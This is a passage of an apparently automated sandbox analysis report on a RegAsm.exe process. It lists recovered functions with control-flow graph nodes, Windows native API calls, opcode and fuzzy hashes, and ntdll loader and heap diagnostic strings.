                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 75 2f82df0-2f82dfc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8bfa8adf393998e7a2fe4c3ae4b6a584564683bed18507ef2cc642119a5971af
                                                    • Instruction ID: d9adad21cd2a2b0640357f56779386a9e61f90b35537cf3d697565b1628afdfa
                                                    • Opcode Fuzzy Hash: 8bfa8adf393998e7a2fe4c3ae4b6a584564683bed18507ef2cc642119a5971af
                                                    • Instruction Fuzzy Hash: 3590023120140423E51171588504707000987D12C1F95C412A1428558D96568A52A125
                                                    Function 004178C3 Relevance: 1.5, APIs: 1, Instructions: 42libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 24 4178c3-4178d7 25 417883-417887 24->25 26 4178d9-4178e3 24->26 27 41788d-4178a1 call 42dfb3 25->27 28 417888 call 42fde3 25->28 32 4178a3-4178b7 LdrLoadDll 27->32 33 4178ba-4178bd 27->33 28->27 32->33
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178B5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: d3299411bf1e50a937f6667c28ea33724047ba3dae6fe64a3131d2ac535fd143
                                                    • Instruction ID: 54a56abf70b17990a2e8d2c273010cf92d3dc450bc441c310fa8257848ad68bc
                                                    • Opcode Fuzzy Hash: d3299411bf1e50a937f6667c28ea33724047ba3dae6fe64a3131d2ac535fd143
                                                    • Instruction Fuzzy Hash: 3FF0447990420EB7CB20EA98CC41F8AB739AF44704F008255E6198A284E271DA05C7D6
                                                    Function 00417836 Relevance: 1.5, APIs: 1, Instructions: 38libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 34 417836-417842 35 417844-41785f 34->35 36 417899-4178a1 34->36 37 417867-41786c 35->37 38 417862 call 42f543 35->38 39 4178a3-4178b7 LdrLoadDll 36->39 40 4178ba-4178bd 36->40 41 417872-417880 call 42fb43 37->41 42 41786e-417871 37->42 38->37 39->40 45 417890-417894 call 42dfb3 41->45 46 417882-41788d call 42fde3 41->46 45->36 46->45
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178B5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: b5f3d8adb56b7c5f358a76f9fc30aa7374ec4129c5479b2b2b230f72498345ec
                                                    • Instruction ID: ed35191485bd26e78d14f8bc5a4d8bc2b35f3199981c4e90215a5c2f17aa1e35
                                                    • Opcode Fuzzy Hash: b5f3d8adb56b7c5f358a76f9fc30aa7374ec4129c5479b2b2b230f72498345ec
                                                    • Instruction Fuzzy Hash: E6F0A471E4420EABDF10DF95D845FD9B374EB54308F0081AAE90C9B240F230DB49CB91
                                                    Function 0042CB63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 50 42cb63-42cba4 call 404843 call 42daa3 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E63E,?,?,00000000,?,0041E63E,?,?,?), ref: 0042CB9F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: ecc0927f4b93ad1f36231936be9797253ed1d12a491a7bd95da4c8907e0fddaa
                                                    • Instruction ID: 17e291f949dd8fe32682208211568506e8e423145098e8dc3cca2f971d96f60e
                                                    • Opcode Fuzzy Hash: ecc0927f4b93ad1f36231936be9797253ed1d12a491a7bd95da4c8907e0fddaa
                                                    • Instruction Fuzzy Hash: D7E06DB2204214BBC610EE99DC41F9B77ACEFC9714F004419FA18A7242D670B92086B4
                                                    Function 0042CBB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 55 42cbb3-42cbf7 call 404843 call 42daa3 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CA62C1D6,00000007,00000000,00000004,00000000,004170D4,000000F4), ref: 0042CBF2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 581d567d42ae88725f4c2be26ba8489c9aa9f8fc13d364bf117693f06630faf4
                                                    • Instruction ID: f4ba802b77e343f44bb6128a4648d250accba097a8aadd8a7e9b3030db0b1c99
                                                    • Opcode Fuzzy Hash: 581d567d42ae88725f4c2be26ba8489c9aa9f8fc13d364bf117693f06630faf4
                                                    • Instruction Fuzzy Hash: 72E06DB27042447BD610EE99DC45FDB33ACEFC9710F004419F908A7241DA70B91087B5
                                                    Function 0042CC03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 65 42cc03-42cc3f call 404843 call 42daa3 ExitProcess
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: 075814bf4e9727fe34a2f11b8b037cbbc4ef379bf893805b1005c2cf77da250d
                                                    • Instruction ID: 20215825ff170cfbe4787cf3c137c5c17864170a60c98dce97b5cbf02dbeac17
                                                    • Opcode Fuzzy Hash: 075814bf4e9727fe34a2f11b8b037cbbc4ef379bf893805b1005c2cf77da250d
                                                    • Instruction Fuzzy Hash: CCE08C763142147BD220FA9ADC01F9B77ACDFC5714F40442AFA08A7242D6B0BA0087F5
                                                    Function 02F82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 70 2f82c0a-2f82c0f 71 2f82c1f-2f82c26 LdrInitializeThunk 70->71 72 2f82c11-2f82c18 70->72
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c72944faf7503b30ee4be7859a003eddc133f08334fdb38221f51b5a5e2edad1
                                                    • Instruction ID: b52e874e034fe90f5c7ae3873f321509c760a8f5e4831753ef61dbb734acb4fc
                                                    • Opcode Fuzzy Hash: c72944faf7503b30ee4be7859a003eddc133f08334fdb38221f51b5a5e2edad1
                                                    • Instruction Fuzzy Hash: 75B09B71D015C5D5EE11F7604A08717790067D1791F15C061D3034645E4738D1D1E175

                                                    Non-executed Functions

                                                    Function 02FC2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: e8abdd49cf2eddbc68c162a196fbf12d7bb7fb12332712cce436ed579b7d8ee1
                                                    • Instruction ID: e3df1972a1622a4e62c2c5b25d5fd7307cfbf84a45f12766411fde01675e4ae9
                                                    • Opcode Fuzzy Hash: e8abdd49cf2eddbc68c162a196fbf12d7bb7fb12332712cce436ed579b7d8ee1
                                                    • Instruction Fuzzy Hash: C5927C71A04342AFE721DE24C980B6BB7E9FB84794F24492DFB95D7290D770E844CB52
                                                    Function 02F78620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FB54CE
                                                    • Thread identifier, xrefs: 02FB553A
                                                    • double initialized or corrupted critical section, xrefs: 02FB5508
                                                    • corrupted critical section, xrefs: 02FB54C2
                                                    • Address of the debug info found in the active list., xrefs: 02FB54AE, 02FB54FA
                                                    • undeleted critical section in freed memory, xrefs: 02FB542B
                                                    • Critical section debug info address, xrefs: 02FB541F, 02FB552E
                                                    • Critical section address., xrefs: 02FB5502
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FB54E2
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FB540A, 02FB5496, 02FB5519
                                                    • Critical section address, xrefs: 02FB5425, 02FB54BC, 02FB5534
                                                    • 8, xrefs: 02FB52E3
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 02FB5543
                                                    • Invalid debug info address of this critical section, xrefs: 02FB54B6
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    • Opcode ID: 3c247b4bf7d57c01e1b950a0b27040721c6eda16d703fe92f2dfd34868bcf47e
                                                    • Instruction ID: 7ce2444253f28ab5cd76c62075f7036831e7361a05109aa093e4566f6ed2de02
                                                    • Opcode Fuzzy Hash: 3c247b4bf7d57c01e1b950a0b27040721c6eda16d703fe92f2dfd34868bcf47e
                                                    • Instruction Fuzzy Hash: 7B81CCB1E00358AFEB20CF95CD44BEEBBB9AF09794F504119E605B7240C379A844CB60
                                                    Function 02FF12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                    • API String ID: 0-3591852110
                                                    • Opcode ID: dbfb619be8aa17b565998d406f9a5ef5c05d755336e3f774323a8d059c16fdaf
                                                    • Instruction ID: da358c0e00d239a6952fc1c73e31fb3df5df8b00eaf3d2096bd7b0523f15a503
                                                    • Opcode Fuzzy Hash: dbfb619be8aa17b565998d406f9a5ef5c05d755336e3f774323a8d059c16fdaf
                                                    • Instruction Fuzzy Hash: B312BE31A00645DFDB65CF29C451BBBBBF2EF09798F188459E78A8B661D734E880CB50
                                                    Function 02F3D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                    • API String ID: 0-3532704233
                                                    • Opcode ID: d3a4627f228c0f0171db07a8e6101f460a87abd59e7d3ae88b33450c3d778297
                                                    • Instruction ID: 946fb6352dfaa09eaa257f73a7c606ad6b4a4eb59ddb05467c4c8944d53f90e0
                                                    • Opcode Fuzzy Hash: d3a4627f228c0f0171db07a8e6101f460a87abd59e7d3ae88b33450c3d778297
                                                    • Instruction Fuzzy Hash: 7BB17D729083559FDB22DF24C840B6BB7E9BB84798F01492EFA99D7240D730D948CF92
                                                    Function 02FD9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                    • API String ID: 0-3063724069
                                                    • Opcode ID: f5cf1be40342ab6c6943792b7c18b5700ab1e592128823713bfc100bf045cffa
                                                    • Instruction ID: 052a7d67e7f2cbe137a4b2fcaf7bc2c296a65c65e8864ec28853905f2126e6e0
                                                    • Opcode Fuzzy Hash: f5cf1be40342ab6c6943792b7c18b5700ab1e592128823713bfc100bf045cffa
                                                    • Instruction Fuzzy Hash: 52D1E772808391ABD721DB94CC41B6BB7EAEF84798F48492DFB44A7250D7B0D9448FD2
                                                    Function 02FF0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 3c2662de8007775a72ff8b34cfd9a7c6f14fa558cdcdec82a87e15072f5ca3de
                                                    • Instruction ID: 9047ab54363fa3e91f25a20229d4a1b3a5d2bfe90b019d582a3abc8e31c37c1d
                                                    • Opcode Fuzzy Hash: 3c2662de8007775a72ff8b34cfd9a7c6f14fa558cdcdec82a87e15072f5ca3de
                                                    • Instruction Fuzzy Hash: 79D1CD31A01685DFDB52EF68C851AAEBBF2EF49784F08805DE7469B266CB34D940CF10
                                                    Function 02F3D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02F3D262
                                                    • @, xrefs: 02F3D0FD
                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02F3D0CF
                                                    • @, xrefs: 02F3D313
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02F3D2C3
                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 02F3D196
                                                    • @, xrefs: 02F3D2AF
                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02F3D146
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                    • API String ID: 0-1356375266
                                                    • Opcode ID: f38c88a23582a732ef781ff2d2bcc952a9f72024f75619a0928d6cf947c05ec3
                                                    • Instruction ID: 30d48aad9301d796c54b3fee536d5e287ef8819680ec405bc8ce71bc321b682c
                                                    • Opcode Fuzzy Hash: f38c88a23582a732ef781ff2d2bcc952a9f72024f75619a0928d6cf947c05ec3
                                                    • Instruction Fuzzy Hash: 03A13D719083459FE722DF24C884B5BF7E9BB88799F40492EEA9896240D774D908CF93
                                                    Function 02F3F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-523794902
                                                    • Opcode ID: 66f21188134e4dcb3ba45b5c9b4acf79d4f99797f7c5582873f8c04d97388e92
                                                    • Instruction ID: 0ac625905b1f4a01ff9f78a544bfdd30fb05724fa7995861cbddb5b666ab0c77
                                                    • Opcode Fuzzy Hash: 66f21188134e4dcb3ba45b5c9b4acf79d4f99797f7c5582873f8c04d97388e92
                                                    • Instruction Fuzzy Hash: FD42F032A04381DFE716DF28C894B2ABBE5FF84388F14466EEA868B751D734D845CB51
                                                    Function 02F5B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                    • API String ID: 0-122214566
                                                    • Opcode ID: 1907265d66bcb47c2ee3df008fd3b7fde63aa11c7a9ea47db8a3b31ea9174f73
                                                    • Instruction ID: c87be077b0da141b2d9f5d5dab4a5e450011d684065b57f8fd412e2fe226a0db
                                                    • Opcode Fuzzy Hash: 1907265d66bcb47c2ee3df008fd3b7fde63aa11c7a9ea47db8a3b31ea9174f73
                                                    • Instruction Fuzzy Hash: 01C17B71F002259BDB249F64CC91BBEB7A5AF453C8F1440A9EF06AB284D7B4CD44C791
                                                    Function 02F763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    • Opcode ID: 67b2c1ffdf6265a0b3291d79dbc27f5e5ce09d0f0cd120fcf821f6cdef0912ea
                                                    • Instruction ID: f404a62454dcb1cab91ce5bc3bf39eea4e2c0e4b3d98d928390ff67028927cbd
                                                    • Opcode Fuzzy Hash: 67b2c1ffdf6265a0b3291d79dbc27f5e5ce09d0f0cd120fcf821f6cdef0912ea
                                                    • Instruction Fuzzy Hash: 26917A31F017549BEB26EF15DE94BEA77A9AF02BD8F00017ADB01BB285D7749800CB90
                                                    Function 02F7C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Loading import redirection DLL: '%wZ', xrefs: 02FB8170
                                                    • LdrpInitializeProcess, xrefs: 02F7C6C4
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 02FB81E5
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 02FB8181, 02FB81F5
                                                    • LdrpInitializeImportRedirection, xrefs: 02FB8177, 02FB81EB
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02F7C6C3
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: 64518575377be8beb56869d7c5b2e102a592fd5a0680a948a02431e3cbc21769
                                                    • Instruction ID: 69422b03aba552d9a6e112f509c0681036172f389ce9c1d1957c543e90b9bc6a
                                                    • Opcode Fuzzy Hash: 64518575377be8beb56869d7c5b2e102a592fd5a0680a948a02431e3cbc21769
                                                    • Instruction Fuzzy Hash: 74311771744341ABD210FF28DD86E6BB799EF81B94F000569FA45AB390D724DC04CFA2
                                                    Function 02F72674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlGetAssemblyStorageRoot, xrefs: 02FB2160, 02FB219A, 02FB21BA
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02FB219F
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02FB21BF
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02FB2178
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02FB2180
                                                    • SXS: %s() passed the empty activation context, xrefs: 02FB2165
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    • Opcode ID: 069c4124e3de7c79fed59b30b4c609f861fc6b6597a064f1c3dcced643229dc2
                                                    • Instruction ID: cf7277cd3e5d3de34391a7651b4e4a8e82a68a3786baf3186b46691e8097a18a
                                                    • Opcode Fuzzy Hash: 069c4124e3de7c79fed59b30b4c609f861fc6b6597a064f1c3dcced643229dc2
                                                    • Instruction Fuzzy Hash: 08310536F40225B7F7229A968C81FABB779DF55AD4F15005ABF05BB240D270DE01C6A1
                                                    Function 02F651EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 02F65247
                                                    • Kernel-MUI-Language-SKU, xrefs: 02F6542B
                                                    • WindowsExcludedProcs, xrefs: 02F6522A
                                                    • Kernel-MUI-Language-Allowed, xrefs: 02F6527B
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02F65352
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: b1294370bd9ff5f6fb96454129ee1ae740c1d0dd648e1684e39da85f38c3344e
                                                    • Instruction ID: 9786224115926dd89bd08304a62967107bd1ab687d5564c90e57a1189b71f727
                                                    • Opcode Fuzzy Hash: b1294370bd9ff5f6fb96454129ee1ae740c1d0dd648e1684e39da85f38c3344e
                                                    • Instruction Fuzzy Hash: 9BF14BB2D11229EFCB11DF98C994EEEBBBAEF48794F55005AE601B7210D7749E01CB90
                                                    Function 02F6D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1975516107
                                                    • Opcode ID: 4629b1e7bc8892fcc8d3369c938c5843751e5012b751a5fdc44c80273704d7dc
                                                    • Instruction ID: 3604e5e3dbd6b989adddffd616cf937fa5b91a0c22c6b0ccb44efb039e6a2783
                                                    • Opcode Fuzzy Hash: 4629b1e7bc8892fcc8d3369c938c5843751e5012b751a5fdc44c80273704d7dc
                                                    • Instruction Fuzzy Hash: D351D172F053459FDB14EFA4C898BADBBB2FF49788F144159CA016B295C775A841CF80
                                                    Function 02F376B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
